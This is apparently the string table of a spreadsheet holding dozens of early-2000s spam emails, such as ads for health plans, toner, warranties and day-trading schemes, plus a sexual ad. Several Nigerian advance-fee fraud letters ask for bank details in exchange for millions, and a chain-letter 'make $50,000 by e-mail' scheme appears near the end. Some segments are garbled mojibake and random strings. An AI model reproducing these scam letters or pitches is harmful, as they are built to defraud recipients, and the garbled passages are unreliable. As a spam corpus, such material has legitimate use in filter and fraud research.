                        Chiropractic Care Plan ... Over 5,000 Participating
                        Doctors NationwideTell me more about how to SAVE up to 80% on all
          my Dental Services.First
                      Name:Last
                      Name:Email
                      Address:How would you like to receive
                      the information?
Phone:
if
                      so, your phone # 
Email:Fax:
if
                      so, your Fax # 
Snail
                      Mail:
if
                      yes then supply us with a mailing address
Street
                      Address:City:
 State:
                       ZIPÂ 
Â 
Â Â 
Â Â We
          are sending this ad to people who have requested information about
          saving on their Dental - Vision Care - Prescription Drugs -
          Chiropractic Care needs. If you have received this in error,Â  CLICK
          HERE and we will remove you from our list and we apologize for any
          inconvenience to you.
</t>
  </si>
  <si>
    <t xml:space="preserve"> Juice... for Your Health! Turn your favorite fruits and vegetables into good-for-you juice! Juiceman II is the quick and easy juicer to help meet your nutritional needs. A few of the benefits of juicing are increased energy, a glowing complexion, strengthened immune system, stronger bones and a reduced risk of disease. Â  Why pay for bottled juice that may have lost its valuable nutrients when you can enjoy healthier, fresh squeezed, homemade juice with fruits and vegetables growing in your garden or from the farmer's market? .Product Includes: 6-Tape Audio Cassette Series
            Recipe &amp; Menu Planner
            Instruction Manual and Salton-Maxim Coupon Booklet
            BONUS: "Juiceman's Power of Juicing" Book by Jay Kordich, Anti-Aging Juice Diet Plan, Immune Strengthening Juice Diet Plan and Weight Loss Juice Diet Plan.  
30-day Money Back GuaranteeClick 
here to unsubscribe from these mailings. Your privacy is extremely important to us. You requested to 
receive this mailing by registering at TV Deals or by subscribing through one 
of our marketing partners. As a leader in permission-based email marketing, we 
are committed to delivering a highly rewarding experience that includes money 
saving offers from your favorite brands, on-line bargains, and entertainment. 
However, if you wish to unsubscribe, please click the link above.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</si>
  <si>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Internet
Exclusive -- TV Deals
Fantastic Prices
Click any Product
for DetailsAMAZING PROFITS BY JOHN BECK
AVACOR HAIR CARE SYSTEM
BALANCE BRACELETBLAST OFF THE POUNDS BY RICHARD SIMMONS
BLOUSSANT
CYBERSONIC TOOTHBRUSHFLAT HOSE - 50FT
JUICEMAN II
MIRACLE BLADEPHASE 4 ORTHOTICS
ROLL-A-HOSE
SHARK STEAM BLASTERSOUNDS OF THE 80S BY TIME LIFE
STICK SHARK
WALK AWAY THE POUNDS FOR ABS Plus
Thousands of other TV Deals 
Online Now
--- Fantastic Prices
While
Supplies Last!
Â CLICK
HERE
Â 
Â 
Â 
If you no longer wish to receive our offers and updates  click hereÂ 
 and we will promptly honor your request.--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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Do you Have an Inkjet or Laser Printer?Â 
        Do
        you Have an Inkjet or Laser Printer?Yes? Then we can SAVE
        you $$$ Money!
Our High Quality Ink &amp; Toner Cartridges come
        with a money-back guarantee, a 1-year
        Warranty*, and get FREE 3-Day SHIPPING
        !*
and best of all...They Cost
         up to 80%  Less        than
        Retail Price!*Click here
        to visit Our Website!*or Call us Toll-Free @
        1-800-758-8084!
*90-day warranty on remanufactured
        cartridges. Free shipping on orders over $40
Â 
Â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t>
  </si>
  <si>
    <t xml:space="preserve">
LIVE SEX SHOWSWET, HOT, HORNY GIRLS WAITING FOR YOU! THE HOTTEST LIVE SEX SHOWS! CLICK HERE TO ENTER NOW !CLICK HERE TO SEE THE SHOWS !to unsubscribe from this mailing list please reply to this email with the word "remove" in the subject line.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</si>
  <si>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Online Marketing Strategies
Need More Clients?	Increase Your Sales 15%-40% Every Month!
Targeted E-mail Marketing Is A Proven Method For Return Sales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Field*Name*
Web 
            Address
Company 
            Name*            State*
Business 
            Phone*
Home 
            Phone
Email 
            Address*
Type of 
            BusinessTo be removed, please  
      Click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</si>
  <si>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FREE Computer With Merchant Account SetupCOMPLETE CREDIT CARD PROCESSING SYSTEMS FOR YOUR BUSINESS. INTERNET -  HOME
BASED -  MAIL ORDER -  PHONE ORDER
Do you accept credit cards? Your competition does!
Â 
Everyone Approved - Credit Problems OK!
Approval in less than 24 hours!
Increase your sales by 300%
Start Accepting Credit Cards on your website!
Free Information, No Risk, 100% confidential.
Your name and information will not be sold to third parties!
Home Businesses OK!  Phone/Mail Order OK!
No Application Fee, No Setup Fee!
Close More Impulse Sales!
Everyone Approved!
 Good Credit or Bad!Â  To apply today, please fill out
        the express form below. It
contains all the information we need to get your account approved. For area's
that do not apply to you please put "n/a" in the box.Upon receipt, we'll fax you with all of the all Bank Card Application
documents necessary to establish your Merchant Account. Once returned we can
have your account approved within 24 hours.Â 
Service
Industry
        StandardUSSite
        Inspection
$50 - $75
FREE
Shipping
$50 - $75
FREE
Warranty
$10 Per Month
FREE
Sales
        Receipts
$10 - $50Â 
FREE
Fraud
        Screening
$.50 - $1.00
Per Transaction
FREE
Amex Set
        Up
$50 - $75
FREE
24 HourÂ Help
        Line
$10 Month
FREE
Security
        Bond
$5000- $10,000
Or More
NONEThis is a No
        Obligation Qualification Form and is your first step to
        accepting credit cards. By filling out this form you will "not
        enter" in to any obligations or
        contracts with us. We will use it to determine the best program
        to offer you based on the information you provide. You will be contacted by one of our representatives within 1-2 business days to go over the rest of your account set up.
Note:Â 
        All Information Provided To Us Will Remain 100%
        Confidential
        !!Â Apply
        Free With No Risk!
Please fill out the
        express application form completely.Incomplete information may prevent us from properly
        processing your application.
Your Full Email Address:
be sure to use your full address (i.e.
user@domain.com)Your Name:Business Name:Business Phone Number:Home Phone Number:Type of Business:Retail BusinessMail Order BusinessInternet Based Business
Personal Credit Rating:ExcellentGoodFairPoor
How Soon Would You Like a Merchant
        Account?
Your information is confidential, it will not be sold or used for any other purpose, and you are under no obligation.
        Your information will be used solely for the purpose of evaluating your business or website for a merchant account so that you may begin accepting credit card payments.List
 Removal/OPT-OUT Option
Click
 Herem
</t>
  </si>
  <si>
    <t xml:space="preserve">Protect your financial well-being.Purchase an Extended Auto Warranty for your Vehicle TODAY.Click Here for your free, Fast, no BS Rates NOW!!Car troubles and expensive repair bills always seem to happen at the worst possible time Dont they?. Protect yourself and your family with an ExtendedWarranty for your car, truck, or SUV, so that a large expense cannot hit you all at once. We cover most vehicles with less than 150,000 miles.Our warranties are the same as the dealer offers but insteadyou are purchasing them direct!!!We offer fair prices and prompt, toll-free claims service. Get an Extended Warranty on your vehicle today.Click here today and we will include at no extra cost:24-Hour Roadside Assistance.Car Rental Benefits.Trip Interruption Benefits.Extended Towing Benefits.Click Here for your free, Fast, no BS Rates NOW!!Save now, don't wait until it is TOO LATE!We search for the best offering's foryou; we do the research and you get only The superior resultsthis email is brought to you by; KBR . To abnegateall future notices, Enter here
</t>
  </si>
  <si>
    <t xml:space="preserve">(Fax) to  my direct confidential  Fax No: 234 1 7591666  Dr. Kataga Bakori
Lagos, Nigeria.
23rd July 2002
Attention President/C.E.O
Dear Sir,REQUEST FOR URGENT BUSINESS RELATIONSHIP.Firstly I must solicit your strictest confidence in this subject. This is by virtue of its nature as 
being utterly confidential and top secret. A member of the Nigeria Export Promotion Council 
(N.E.P.C.)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business.Within the ministry of petroleum resources where I work as a director of engineering and 
projects, and with the co-operation of four other very top officials, we have under our 
control as overdue contract payments, bills totaling Thirty One Million United States Dollars, 
which we want to transfer to a foreign account, with the assistance and co-operation of a 
foreign company to receive the said funds on our behalf or a reliable foreign individual 
account to receive the funds.The source of the fund is as follows: during the last military government here in Nigeria 
which lasted bout eleven months, government officials set up companies and awarded 
themselves various contracts which were grossly over-invoiced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US$31,000,000.00 (THIRTY 
ONE MILLION UNITED STATES DOLLARS) hence we are writing you this letter. the present civilian government is determined to pay foreign contractors l debts owed 
so as to maintain an amiable relationship with foreign governments and non-government 
financial agencies.  We have decided to include our bills for approval with the co-operation 
of some officials of the federal ministry of finance (F.M.F) and the central bank of Nigeria 
(C.B.N).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departments concerned.I have the authority of my partners involved to propose that should you be willing to assist 
us in this transaction, your share as compensation will be us$6.2 million (20%), us$21.7 
million (70%) for us and us$3.1 (10%) for 
taxation and miscellaneous expenses.The business itself is 100% safe, provided you treat it with utmost secrecy and 
confidentiality.  Also your area of specialization is not m hindrance to the successful 
execution of this transaction.  I have reposed my confidence in you and hope that you will 
not disappoint me. I will bring the complete picture of the transaction to your 
knowledge when I have heard from you.Thanks for your co-operation,Yours faithfully,Dr. Kataga BakoriNB: Please respond by sending a facsimile (Fax) to  my direct confidential  Fax No: 234 1 
7591666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</si>
  <si>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Online Marketing Strategies
Need More Clients?	Increase Your Sales 15%-40% Every Month!
Targeted E-mail Marketing Is A Proven Method For Return Sales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Field*Name*
Web 
            Address
Company 
            Name*            State*
Business 
            Phone*
Home 
            Phone
Email 
            Address*
Type of 
            BusinessTo be removed, please  
      Click 
      here..
</t>
  </si>
  <si>
    <t xml:space="preserve">
&lt;&gt; Get up to 4 receivers installed in 4 rooms! 
&lt;&gt; No Equipment To Buy. 
&lt;&gt; Fist 3 Months of Free Service! - 
&lt;&gt; Up to 170 CHANNELS of CD quality sound and picture 
&lt;&gt; PROGRAMMING LESS EXPENSIVE than cable TV in most markets You can receive FREE INSTALLATION of a Dish Network 
Satellite TV System! You can also upgrade to a Personal Digital Video Recorder. 
(Retail value $499 if you had to buy this!) Click here to get your FREE INSTALLATION of a Dish Network satellite TV 
System and 3 months of free service before this promotion expires: http://www.proleadcom.com/discsat/index.php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</si>
  <si>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Sir/Ma, 
I am HAJIYA MARYAM ABACHA, wife of the late Nigeria Head of State,General Sanni Abacha who died on the 8th of June, 1998 while still on active duty. l am contacting you in view of the fact that we will be of great assistance to each other likeness developing a cordial relationship. I currently have within my reach the sum of THIRTY FIVE MILLION US Dollars (US$35,000,000.00) cash which l intend to use for investment, like Real Estate Development or import/export business specifically in your country. This money came as a payback contract deal between my late husband and a Russian Firm on our countries multi-billion dollars Ajaokuta Steel Plant Project. The Russian Partners returned my husband's share of USD$35,000,000.00 after the death of my husband and lodged in my husband's security company of which l am director right now, the new Civilian Government have intensified their probe on my husband's financial and oil company. In view of these, l acted fast to withdraw the US$3!
 5,000,000.00 from the company's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2001. You can check it through their website : www.thisdayonline.com , click on archives,8th. june, 2001)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3!
 0% of the total sum to you for the expected service and assistance, 10
%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attorney,Barrister Aishat Gidado at aishatgidado@go.com or her number 248033044180.
Best Regards. 
Hajia Maryam Abacha.--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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8232uIAl6-753PUkF1189GdAA5-028quJX3243TdaE2-074Tyus9203nLbO9-417tEAl63--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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chrism
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">LazyTraders,Even when the Market takes a 300 odd point dive you can still make money
in the Stock Market if you know what you are doing.If you don't know what you are doing follow people who do.This week You could have made:Up to 392% using The Lazy DayTrader System.One Stock that you would have found immediately was a stock that was
trading at .55, until a large company announced that it was offering $1.10
for the shares.What do you think happened to the value of the Shares?Within the same day they went up to $1.10. 100% profit in one day!There were 3 more examples like it this week which you would have found
within 5 seconds with the Lazy DayTrader System.Learn how to do this at:http://lazytrader.get.toOur Chatroom this week made $455,000 trading 1000 shares with no losing
days.If you want to learn about Fibonacci Numbers and Elliott Waves join the
Chatroom for $199 per month and watch Mr G for a while before trading with
him to learn his methods.Some comments from Friday's Chatroom:"bones&gt; G and Chat, good job as usual.  You helped me make 2400.00 in closed trades the past 2 days just trading 2    and 3 lots. ditto that I'm 2350 in 4 days only using 3 lot. Thanks G, you two guys are the greatest.
 Deepest thanks to you, G &amp; C,  my numbers are great for the month and week.  Up 2000 + on week, $8000 + on month.  Never happened for me before!
 thanks G, it's your doing, I just tag along. I'm up 25 points today!"
 If you want to use StockPicking Software to tell you when there is a buy
and when to sell, subscribe to our AI Picks for $299 per month.Our AI Picks produced 39.8% average profit every day this week.It produces both long and shorting opportunities. You can start trading with as little as $500 from 8 AM EST until 8 PM EST.
Have a nice day.
Frank vanderlugthttp://lazytrader.get.to
If our server is down go to any Search Engine and type "lazy daytrader"To be removed just send an email to:
lazytrader@ultimateemail.comOr fax us at:808-575-7312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
</t>
  </si>
  <si>
    <t xml:space="preserv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</si>
  <si>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&gt;&gt;From the Desk of Mr. Kenneth Uba
Union Bank of Nigeria,
Lagos-Nigeria.
ATTN: THE PRESIDENT/C.E.O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$31,000,000.00 (Thirty One million United States Dollars only) in an account that belongs to one of our foreign customers who died along with his entire family of a wife and two children in November 1997 in a Plane crash.
Since we heard of his death, we have been expecting his next-of-kin to come over and put claims for his money as the heir, because we cannot release the fund from his account unless someone applies for claim as
the next-of-kin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bank's treasury as unclaimed fund.
We have agreed that our ratio of sharing will be as stated thus; 
20 % for you as foreign partner, 75 % for us the officials in my department and 5 % for the settlement of all local and foreign expenses incurred by us and you during the course of this business.
 Upon the successful completion of this transfer, I and one of my colleagues will come to your country and mind our share. It is from our 75 % we intend to import Agricultural machineries into my country as a way of recycling the fund.  To commence this transaction, we require you to immediately indicate your interest by a return e-mail and enclose your private contact telephone number, fax number full name and address and your designated
bank coordinates to enable us file letter of claim to the appropriate departments for necessary approvals before the transfer can be made.Note also, this transaction must be kept STRICTLY CONFIDENTIAL because of its nature. 
I look forward to receiving your prompt response.
Mr. Kenneth Uba
Union Bank of Nigeria.
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
Mailing
Â 
We offer the highest quality 
                          inkjet cartridges and Laser Toners at super low 
                          prices. All of our products are 100% guaranteed and 
                          factory tested to meet the quality specifications set 
                          forth by the Original Equipment Manufacturer (OEM). 
                          Our cartridges and refill kits will give you images 
                          equivalent to those produced by OEM cartridges but 
                          they cost much less.
Save up to 80% off retail prices.
                         All our products are 100% satisfaction guaranteed.
We offer FREE 
                        SHIPPING on all U.S. 
                        orders over .  
All orders are sent Priority Mail with online tracking.
We fully protect your privacy and security.
                         We're dedicated to your satisfaction.
We Offer a 100% Satisfaction Guarantee!Â 
Â 
You received this email because you signed up at one of Consumer Media's websites or you signed up with a party that has contracted with Consumer Media. To unsubscribe from our email newsletter, please visit http://opt-out.marketingontarget.net/?e=jm@netnoteinc.com. 
</t>
  </si>
  <si>
    <t xml:space="preserve">
New Page 1Hi,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contests--over and over UNTIL YOU WIN (or tell it to stop).
            We at Grab.com are so excited by this system that we're putting it
            online for our members to use.
            THE PRIZE IS YOURS - GUARANTEED!            If you win a contest using this program, the prize is legally yours
            to keep--GUARANTEED! Our lawyers assured us that Michael's program
            is legal, and online contest sponsors have CONFIRMED that it doesn't
            violate their rules. So if you win a prize, you'll receive it.
            If you don't receive it, we'll pay you ourselves. GUARANTEED.
            FREE TO USE.            Best of all, this service is free to use. All you pay for is related
            network expenses--which only cost $1 for 7 days of the service.
            That's dozens of entries for what you'd usually pay to get a single
            lottery ticket!            As a member in good standing of this mailing, we've already
            set up the automatic entry system for you. All that's left
            is for you to turn it on. Once you do, you can sit back and watch it
            enter you into contest after contest after contest after contest....
Click
            here to begin!            P.S. This system will continue to enter you into hundreds of free
            contests until you win (or cancel it).            P.P.S. All the prizes you win are yours to keep--GUARANTEED!(C)
            Copyright Grab.com 2002.Remove yourself from this list by either:
  Entering your email address below and clicking REMOVE:
OR
  Reply to this message with the word "remove" in the subject line.
  This message was sent to address cypherpunks@einstein.ssz.com
pmguid:1dx.2qbm.fsi52--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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jstaddon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</si>
  <si>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ï¿½@ 
Â Â Â 
Â  ï¿½ï¿½ï¿½~ï¿½Wï¿½ï¿½ï¿½G ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
Â Â  
      ï¿½mï¿½@Â Â Â  ï¿½Wï¿½Gï¿½ï¿½ï¿½ï¿½ï¿½gï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Wï¿½Aï¿½ï¿½ï¿½ï¿½ï¿½gï¿½ï¿½ï¿½ï¿½Â Â  ï¿½ï¿½Â Â Â  ï¿½@ï¿½}ï¿½G
Â Â  
      ï¿½ï¿½ï¿½vï¿½qï¿½ï¿½ï¿½G
Â Â  ï¿½ï¿½ï¿½qï¿½qï¿½ï¿½ï¿½G
Â Â  ï¿½ï¿½ï¿½ï¿½ï¿½qï¿½ï¿½ï¿½G
Â Â  
      ï¿½qï¿½lï¿½lï¿½ï¿½ï¿½G
Â Â  
      ï¿½ï¿½ï¿½@ï¿½sï¿½ï¿½ï¿½G
Â Â  
      ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½hï¿½ï¿½ï¿½Kï¿½Oï¿½ï¿½ï¿½~ï¿½ï¿½ï¿½Tï¿½qï¿½lï¿½ï¿½Â  ï¿½ï¿½ï¿½@ï¿½@ï¿½ï¿½ï¿½Gï¿½ï¿½ï¿½ï¿½ï¿½Hï¿½uï¿½ï¿½ï¿½tï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½~ï¿½Bï¿½O150ï¿½ï¿½ï¿½Aï¿½ï¿½ï¿½Tï¿½ï¿½
Â Â Â Â  Â Â  
      ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Aï¿½pï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½~ï¿½Nï¿½ï¿½ï¿½Bï¿½zï¿½CÂ Â  Â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</si>
  <si>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ì¼ë°˜ ì»´í“¨í„° ì›ê±°ë¦¬ ê°ì‹œ ì‹œìŠ¤í…œÂ ì›ê±°ë¦¬ ê°ì‹œ ì‹œìŠ¤í…œëŒ€ë¦¬ì  ë° ë”œëŸ¬Â ëª¨ì§‘
ì•ˆë‚´Â Digital
Security Solution
S9 Inc.
Â 
Â Â Â Â Â Â Â Â 
S9 ì—ì„œëŠ” ì†Œê·œëª¨ ë° ì¼ë°˜ ë§¤ìž¥ìš©ìœ¼ë¡œ ê°œë°œëœ ì›ê±°ë¦¬ ê°ì‹œ ì‹œìŠ¤í…œì˜ ìœ í†µ ë° ì„¤ì¹˜ë¥¼ ë‹´ë‹¹í•˜ì‹¤ ë¶„ì„
ëª¨ì§‘í•©ë‹ˆë‹¤.
ì‹œìŠ¤í…œ ê°œìš”1. ê¸°ì¡´ì˜ CCTV ê³µì‚¬ì˜ ì£¼ìš” ë¬¸ì œì ì¸ ë†’ì€ ê°€ê²©ëŒ€ë¥¼ ì²¨ë‹¨ ë””ì§€í„¸
ë°©ì‹ìœ¼ë¡œ ì „í™˜í•¨ìœ¼ë¡œì„œ ì†Œê·œëª¨ ë§¤ìž¥ê¹Œì§€ë„ ì„¤ì¹˜ë¶€ë‹´í•´ì†Œ.2. ì›ê²©ì§€ì—ì„œ ì¸í„°ë„·ì„
í†µí•´ ë§¤ìž¥ì„ í•­ìƒ ì‹¤ì‹œê°„ ë³¼ ìˆ˜ê°€ ìžˆìŒ. ìµœëŒ€ 16êµ°ë°ì˜ ë§¤ìž¥ì„ ë™ì‹œì— ì›ê²©ì§€ì—ì„œ
ê°ì‹œ.3. ì•¼ê°„ ì¹¨ìž…ìž ë°œìƒì‹œ ì˜ˆì•½ì „í™” 5êµ°ë°ë¡œ ìžë™ í†µë³´í•˜ë©° ì‹¤ì‹œê°„ í˜„ìž¥ê°ì²­ ë°
í˜„ìž¥í†µí™”ê°€ ê°€ëŠ¥í•¨.4. ë””ì§€í„¸ë°©ì‹ìœ¼ë¡œ í™”ìƒì €ìž¥ì„ ì»´í“¨í„°ì— í•¨ìœ¼ë¡œ ê¸°ì¡´ì˜ Video TapeëŠ”
í•„ìš”ì—†ìŒ.
ì—¬ëŸ¬ìš©ë„ì˜ ë§ˆì¼€íŒ…ì´ ê°€ëŠ¥í•˜ë©° ë‹¹ì‚¬ì˜ ì™„ë²½í•œ ê¸°ìˆ ì§€ì›ìœ¼ë¡œ ì˜ì—…ì—ë§Œ ì „ë…í•˜ì‹¤ìˆ˜ ìžˆìŠµë‹ˆë‹¤.
ì œí’ˆë¬¸ì˜ : S9 ì˜ì—…íŒ€ 02-688-8088. http://www.snine.com/Â  sNine@sNine.com
ë³¸ë©”ì¼ì€ ì •ë³´í†µì‹ ë§ ì´ìš©ì´‰ì§„ ë° ì •ë³´ë³´í˜¸ ë“±ì— ê´€í•œ ë²•ë¥  ì œ
50ì¡°ì— ì˜ê±°í•œ [ê´‘ê³ ]ë©”ì¼ìž…ë‹ˆë‹¤.ë‹¹ì‚¬ëŠ” emailì™¸ ì–´ë– í•œ ì •ë³´ë„ ê°€ì§€ê³  ìžˆì§€ ì•ŠìŠµë‹ˆë‹¤. ìˆ˜ì‹ ì„ ì›ì¹˜ì•Šì„ì‹œ ìˆ˜ì‹ ê±°ë¶€ë¥¼
ëˆŒëŸ¬ì£¼ì‹­ì‹œìš”
Â 
</t>
  </si>
  <si>
    <t xml:space="preserve">
creditfixThank You,Your email address was obtained from a purchased 
list, Reference # 1580-17600.Â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</si>
  <si>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rpd</t>
  </si>
  <si>
    <t xml:space="preserve">Want to make a million bucks this year?
Me too but it's probably not going happen!
However if you're looking for the opportunity to
make a couple thousand a week,
working from home with your pc, we need to talk.
If you're over 18 and a US resident,
Just Click REPLY
Send me your Name, State,
Complete telephone number,
and the best time to contact you.
I will personally speak with you within 48 hours.
 Have a great day!  Removal instructions:
*************************
To be removed from this list please reply with "remove" in the subject line.
Please allow a few days for removal to take effect. Thanks!!--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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cpunks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</si>
  <si>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whole ad Remove yourself from this recurring list by:Clicking here to send a blank email to unsub-7552100-339@mm53.comORSending a postal mail to CustomerService, 427-3 Amherst Street, Suite 319, Nashua, NH 03063This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</si>
  <si>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cypherpunks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</si>
  <si>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*****************BANNEDCD::::::::::::::::::::::::::::::::::&gt;NET******************I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t>
  </si>
  <si>
    <t xml:space="preserve">
Hello, 
Premium Phone Qualified 
Business Opportunity Leads
If you're spending money marketing a Business Opportunity or MLM,
you will definitely be interested in 
what we have to offer you. 
You're tired of blindly spending money for leads and not having 
any idea what kind of response you'll get from it.Â  Sometimes
calling 100 people without one single signup!Â  Sometimes 
talking to people who have been bombarded by bizop pitches
to the point of them hanging up when you call!Â  (Leads oversold)
We're here to help! 
We'll get you qualified leads for your MLM or Business Opportunity. 
Period. 
No qualifiers, no conditions, no nonsense. 
We'll do it quickly, and professionally. 
And we won't ask you for a single dime without guaranteeing results!Here's How We Generate Our Leads...
- All of these Leads are generated IN-HOUSE!
- One source we use for Lead-generation is a Business Opportunity
Seeker Lead List of people who have requested info. about making 
extra income from home by either filling out an online questionnaire,
or responding to an email ad, classified ad, postcard, etc.,.
- The other source we use is an Automated Call Center.
We have computerized software that dials up LOCAL residents,
plays a recorded message asking them if they're interested in
making money from home.Â  If they are, the system records their
name and phone number for us to CALL BACK AND QUALIFY.
-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We'll close by telling them they'll be contacted by no
more than 3 or 4 people regarding different opportunities.
- Then the Leads are submitted to a website we set up for you, 
from which the results are then forwarded to you by email.
- This way, you get the Leads fresh, and in *real-time* 
(only minutes old).Â  Never more than 24 hours old.Â  Guaranteed!
- We GUARANTEE that you'll receive AT LEAST a valid Name, 
Phone Number and the Time-Date Stamp corresponding to when
the Lead was generated!Â  However, almost ALL leads will have
ALL of the information asked above.Benefits of our Phone Qualified Lead Generation System:
1. They will be Extremely Qualified due to the nature of the 
qualifying questions that will be asked (above).
2. They are Super-Fresh!Â  Delivered in Real-Time only moments 
after they are contacted and qualified!Â  (Not 30-120 days old)
3. They're Targeted.Â  Each Lead we generate originates from a
targeted list of business opportunity seekers.
4. They're Highly Receptive!Â  Receptivity is very, very high 
because they aren't bombarded by tons of people pitching 
them on opportunities!Â  Also they'll remember speaking to 
someone over the phone.Â  Especially since we tell them to 
expect your call!
5. No "feast or famine" activity.Â  Leads will be coming in 
regularly.Â  You dictate the flow!
6. No more cold calls!Â  We tell your prospects you'll be calling.
7. You can *personalize* your approach with the info. you 
get with each Lead!
8. Save Time.Â  Naturally, better Leads means less calls to get a sale.
9. Lower "burnout" factor.Â  Calling red-hot Leads makes it easier 
to pick up the phone, day in and day out.
10. You can sort your Leads based on their responses and call the
hottest ones first.
11. You can get new reps started quicker using these Leads due 
to higher closing ratios.Â  Of course, this builds faster and stronger 
momentum, and skyrockets "new rep retention" as a result of 
"quick successes".
12. The Leads will be uniform - almost all leads will have the info. 
indicated above. (All leads will have valid phone numbers.)
13. They're double-qualified because to generate the Lead, 
a list of previous business opportunity seekers is used.
14. Excellent control of the flow of Leads coming through.
If you've been trying to run things too long without a steady flow of high
quality leads, call us NOW to get things in motion.Â  Just let us know 
what program you want to advertise and we'll create a customized 
lead-generation campaign for you. 
Since your need to get business moving has probably never been 
more critical than it is today, why not call us NOW!
These are fresh, highly qualified leads because these people aren't 
just responding to some "Generic Business Opportunity" ad, they're 
contacted over the phone specifically for YOUR company!Â  And we 
forward you the leads within minutes of the lead being generated - not 
days, weeks, or months!Start Generating As Many SIGN-UPS as You Can Handle!
Explode Your Downline and Income!
Call For Details and Discount Pricing!
Toll Free 1-866-853-8319 ext.1
Or email us here for full details
To opt out Click Here--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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START A BUSINESS OR FUND YOUR CHILD'S COLLEGE WITHOUT DEBT.Get the money you need and NEVER have to pay it back.
Starting a business or putting your child through college is an expensive 
undertaking. That's where we can Help. Our valuable ebook will 
put you in touch with thousands of programs to help you get the money 
you need. That's right FREE Grant &amp; Scholarship Money.
Don't Let Someone Else Get YOUR Share!Reg. Price $34.95     Order by July 31 and SAVE $10.00. Tour our SECURE website for more details: 
http://www.moneyfromthetree.com/moneytree/index5.htm You are receiving this special offer because you have provided permission 
to receive third party online promotions.  To be eliminated from future marketing:
http://www.moneyfromthetree.com/moneytree/omit.htmrcbvlirnuibhhejdtjdpjyogjdeyrklxvrjwo--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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creditfixThank You,Your email address was obtained from a purchased 
list, Reference # 1320-15001.Â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</si>
  <si>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improvement.Click below to enter our web site:
http://www205.wiildaccess.com/hgh/
**************************************************
If you want to get removed
from our list please email at- standardoptout@x263.net (subject=remove "your email")
**************************************************
</t>
  </si>
  <si>
    <t xml:space="preserve">MR MABO LOKO
BRANCH OFFICER,
UNITED BANK FOR AFRICA PLC
ILUPEJU LAGOS NIGERIA
ATT:PRESIDENT/C.E.OSIR                           AN URGENT BUSINESS PROPOSAL
I am pleased to get across to you for a very urgent and profitable 
business proposal,Though I don't know you neither have I seen you before but my confidence was reposed On you when the Chief Executive of Lagos State
chamber of Commerce and Industry handed me your contact for a 
confidential business. I am AN OFFICER with the United Bank for Africa Plc (UBA),Ilupeju branch,
Lagos Nigeria.The intended business is thus; We had a customer, a Foreigner (a 
Turkish)resident in Nigeria, he was a Contractor with one of the Government Parastatals. He has in his Account in my branch the sum of US$35 Million(Thirty five Million U.S. Dollars).
Unfortunately, the man died four years ago until today non-of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(30%) of
the Total sum at the end of the transaction. It is risk free and a mega
fortune. 
All correspondence Towards this transaction will be through the e-mail
addresses. 
I await your earliest response.  
Thanks, Yours SincerelMR MABO LOKO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</si>
  <si>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fork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http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">"Now
        is the time to take advantage of falling interest rates! There is no
        advantage in waiting any longer."Refinance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HERE"Please
        CLICK HERE  to fill out a quick form. Your request will be
        transmitted to our network of mortgage specialists who will respond with
        up to three independent offers.This service is 100% free to home owners and new home buyers without
        any obligation.
Visit the website to be taken out of this database.
National Averages
Program
Rate
30Year Fixed
6.375%
15Year Fixed
5.750%
5Year Balloon
5.250%
1/1Arm
4.250%
5/1Arm
5.625%
FHA30 Year Fixed
6.500%
VA 30 Year Fixed
6.500%"You did all the shopping for me. Thank you!
-T. N. Cap.
CA
"..You helped me finance a new home and I got a
      very good deal.
- R. H. H. CA
"..it was easy, and quick...!
-V. S. N. P. WA38191297
http://xent.com/mailman/listinfo/fork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</si>
  <si>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Now!!!If above link doesn't work, Click Here
Â 
5644bpjd2-377pFPY5008CNGO0-002OUsM8515zVfL7-701GWKM2954NYPO7-265Cugn9200l68
</t>
  </si>
  <si>
    <t>Government Grants E-Book 2002 editionkatfish48!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credit.Please Visit Our Website
And Place Your  Order TODAY! CLICK HERE Â We apologize for any email you may have inadvertently received.
Please CLICK HERE to be removed from future mailings. [BFRYTE^3247(^(PO1:K]</t>
  </si>
  <si>
    <t xml:space="preserve">Fire Your Boss...
Say "Goodbye" to the 9-5!Tired of working to make someone else wealthy?
FREE tape teaches you how to make YOU wealthy!
Click here and 
send your name and mailing address for a free copy
Â To unsubscribe click 
here
 ndmcshjjevibsvurgdvmldytkkogshjm
</t>
  </si>
  <si>
    <t xml:space="preserve">
creditfixThank You,Your email address was obtained from a purchased 
list, Reference # 1580-17600.Â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</si>
  <si>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Please visit http://ukprankcalls.com to play a hilarious joke on your mates!
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear jm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
  </si>
  <si>
    <t xml:space="preserve">
Hi,You can make $50,000 or more in the next 90 days sending e-mail.
Seem impossible? Is there a catch?  NO, there is no catch; just
send your e-mails and be on your way to financial freedom.Basically,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LEGAL.Just read the next few paragraphs and see what you think. If you
like what you read, great! If you don't, read it again because you
must have missed something."AS SEEN ON NATIONAL TELEVISION""Making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it."HERE IT IS BELOW"*** Print This Now For Future Reference ***The following income opportunity is one you may be interested in
taking a look at. It can be started with VERY LITTLE investment
($25) and the income return is TREMENDOUS!!!THIS IS A LEGITIMATE, LEGAL, MONEY MAKING OPPORTUNITY.It does not require you to come into contact with people, do any
hard work, and best of all, you never have to leave your house
except to get the mail.Simply follow the instructions, and you really can make this
happen. This e-mail order marketing program works every time if
you put in the effort to make it work. E-mail is the sales tool of
the future. Take advantage of this non-commercialized method of
advertising NOW!The longer you wait, the more savvy people will be taking your
business using e-mail. Get what is rightfully yours. Program
yourself for success and dare to think BIG. It sounds corny, but
it's true. You'll never make it big if you don't have this belief
